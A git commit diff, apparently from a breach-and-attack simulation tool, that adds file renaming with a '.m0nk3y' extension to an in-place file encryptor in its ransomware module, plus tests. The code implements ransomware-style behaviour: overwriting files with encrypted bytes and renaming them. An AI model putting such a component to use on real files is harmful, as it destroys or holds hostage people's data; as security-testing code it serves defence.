Agent: Add ability to rename file to InPlaceEncryptor
This commit is contained in:
parent
55ba5f530d
commit
39171f0950
|
@ -1,13 +1,32 @@
|
|||
import re
|
||||
from pathlib import Path
|
||||
from typing import Callable
|
||||
|
||||
FILE_EXTENSION_REGEX = re.compile(r"^\.[^\\/]+$")
|
||||
|
||||
|
||||
class InPlaceEncryptor:
|
||||
def __init__(self, encrypt_bytes: Callable[[bytes], bytes], chunk_size: int = 64):
|
||||
def __init__(
|
||||
self,
|
||||
encrypt_bytes: Callable[[bytes], bytes],
|
||||
new_file_extension: str = "",
|
||||
chunk_size: int = 64,
|
||||
):
|
||||
self._encrypt_bytes = encrypt_bytes
|
||||
self._chunk_size = chunk_size
|
||||
|
||||
if new_file_extension and not FILE_EXTENSION_REGEX.match(new_file_extension):
|
||||
raise ValueError(f'"{new_file_extension}" is not a valid file extension.')
|
||||
|
||||
self._new_file_extension = new_file_extension
|
||||
|
||||
def __call__(self, filepath: Path):
|
||||
self._encrypt_file(filepath)
|
||||
|
||||
if self._new_file_extension:
|
||||
self._add_extension(filepath)
|
||||
|
||||
def _encrypt_file(self, filepath: Path):
|
||||
with open(filepath, "rb+") as f:
|
||||
data = f.read(self._chunk_size)
|
||||
while data:
|
||||
|
@ -19,3 +38,7 @@ class InPlaceEncryptor:
|
|||
f.write(encrypted_data)
|
||||
|
||||
data = f.read(self._chunk_size)
|
||||
|
||||
def _add_extension(self, filepath: Path):
|
||||
new_filepath = filepath.with_suffix(f"{filepath.suffix}{self._new_file_extension}")
|
||||
filepath.rename(new_filepath)
|
||||
|
|
|
@ -14,10 +14,22 @@ from tests.utils import hash_file
|
|||
from infection_monkey.ransomware.in_place_encryptor import InPlaceEncryptor
|
||||
from infection_monkey.utils.bit_manipulators import flip_bits
|
||||
|
||||
EXTENSION = ".m0nk3y"
|
||||
|
||||
|
||||
def with_extension(filename):
|
||||
return f"{filename}{EXTENSION}"
|
||||
|
||||
|
||||
@pytest.fixture(scope="module")
|
||||
def in_place_bitflip_encryptor():
|
||||
return InPlaceEncryptor(flip_bits, 64)
|
||||
return InPlaceEncryptor(encrypt_bytes=flip_bits, chunk_size=64)
|
||||
|
||||
|
||||
@pytest.mark.parametrize("invalid_extension", ["no_dot", ".has/slash", ".has\\slash"])
|
||||
def test_invalid_file_extension(invalid_extension):
|
||||
with pytest.raises(ValueError):
|
||||
InPlaceEncryptor(encrypt_bytes=None, new_file_extension=invalid_extension)
|
||||
|
||||
|
||||
@pytest.mark.parametrize(
|
||||
|
@ -47,3 +59,15 @@ def test_file_encrypted_in_place(in_place_bitflip_encryptor, ransomware_target):
|
|||
actual_inode = os.stat(test_keyboard).st_ino
|
||||
|
||||
assert expected_inode == actual_inode
|
||||
|
||||
|
||||
def test_encrypted_file_has_new_extension(ransomware_target):
|
||||
test_keyboard = ransomware_target / TEST_KEYBOARD_TXT
|
||||
encrypted_test_keyboard = ransomware_target / with_extension(TEST_KEYBOARD_TXT)
|
||||
encryptor = InPlaceEncryptor(encrypt_bytes=flip_bits, new_file_extension=EXTENSION)
|
||||
|
||||
encryptor(test_keyboard)
|
||||
|
||||
assert not test_keyboard.exists()
|
||||
assert encrypted_test_keyboard.exists()
|
||||
assert hash_file(encrypted_test_keyboard) == TEST_KEYBOARD_TXT_ENCRYPTED_SHA256
|
||||
|
|
Loading…
Reference in New Issue